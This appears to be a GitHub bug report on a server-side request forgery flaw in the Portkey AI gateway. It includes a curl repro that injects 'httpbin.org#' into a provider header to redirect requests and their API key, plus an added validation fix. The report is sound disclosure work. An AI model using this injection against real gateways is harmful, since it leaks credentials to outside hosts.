bug: SSRF via URL fragment injection in provider URL construction #1596

@akhilesharora

Description

What Happened?

Provider URL components like resourceName and vertexRegion are concatenated directly into fetch URLs without validation. A # in the value breaks the URL structure - the part after # becomes a fragment, so the hostname resolves to whatever comes before it.

x-portkey-azure-resource-name: httpbin.org# builds https://httpbin.org#.openai.azure.com/openai, which hits httpbin.org instead of Azure. The api-key header goes with it.

Affected fields:

  • resourceName (x-portkey-azure-resource-name) - hostname injection
  • vertexRegion (x-portkey-vertex-region) - hostname injection
  • vertexProjectId (x-portkey-vertex-project-id) - path injection

What Should Have Happened?

These values should be validated before URL construction. Only alphanumeric characters, hyphens, and dots should be allowed.

Relevant Code Snippet

// src/providers/azure-openai/api.ts:15
return `https://${resourceName}.openai.azure.com/openai`;

// src/providers/google-vertex-ai/api.ts:65
return `https://${vertexRegion}-aiplatform.googleapis.com`;

Repro:

npm run dev:node

curl http://localhost:8787/v1/chat/completions \
  -H "content-type: application/json" \
  -H "x-portkey-provider: azure-openai" \
  -H "x-portkey-azure-resource-name: httpbin.org#" \
  -H "x-portkey-azure-deployment-id: gpt-4" \
  -H "x-portkey-azure-api-version: 2024-01-01" \
  -H "x-portkey-api-key: test-key" \
  -d '{"model":"gpt-4","messages":[{"role":"user","content":"hi"}]}'

# Returns 405 from httpbin.org - gateway connected to the wrong host
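The following is an added example, not Portkey's code: it reproduces the URL parse that sends the request to the wrong host, and shows the allowlist check the report asks for applied before the template string, with a parsed-hostname check as a second guard. `safeAzureBaseUrl`, `safeVertexBaseUrl`, `assertSafeComponent` and `effectiveHost` are names chosen here and do not exist in the project.

```typescript
// Added example (not from the Portkey gateway). Shows why a "#" in a
// provider URL component redirects the request, and a validating builder.

// Allowlist from the report: alphanumerics, hyphens and dots only.
const SAFE_URL_COMPONENT = /^[A-Za-z0-9.-]+$/;

// Reject any component that could alter URL structure. Name is only
// used for the error message.
export function assertSafeComponent(name: string, value: string): string {
  if (!SAFE_URL_COMPONENT.test(value)) {
    throw new Error(`invalid ${name}: only [A-Za-z0-9.-] is allowed`);
  }
  return value;
}

// Unsafe: mirrors the concatenation quoted from api.ts, kept here only
// to show what the parser does with the result.
export function unsafeAzureBaseUrl(resourceName: string): string {
  return `https://${resourceName}.openai.azure.com/openai`;
}

// Hardened: validate the component first, then confirm the parsed host
// still sits under the expected provider domain (defence in depth).
export function safeAzureBaseUrl(resourceName: string): string {
  assertSafeComponent("resourceName", resourceName);
  const url = new URL(`https://${resourceName}.openai.azure.com/openai`);
  if (!url.hostname.endsWith(".openai.azure.com")) {
    throw new Error("constructed host is outside openai.azure.com");
  }
  return url.toString();
}

// Same treatment for the Vertex region quoted from api.ts:65.
export function safeVertexBaseUrl(vertexRegion: string): string {
  assertSafeComponent("vertexRegion", vertexRegion);
  const url = new URL(`https://${vertexRegion}-aiplatform.googleapis.com`);
  if (!url.hostname.endsWith("-aiplatform.googleapis.com")) {
    throw new Error("constructed host is outside googleapis.com");
  }
  return url.toString();
}

// The host fetch() will actually connect to: the URL parser treats
// everything after "#" as a fragment, which is never sent on the wire.
export function effectiveHost(url: string): string {
  return new URL(url).hostname;
}
```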
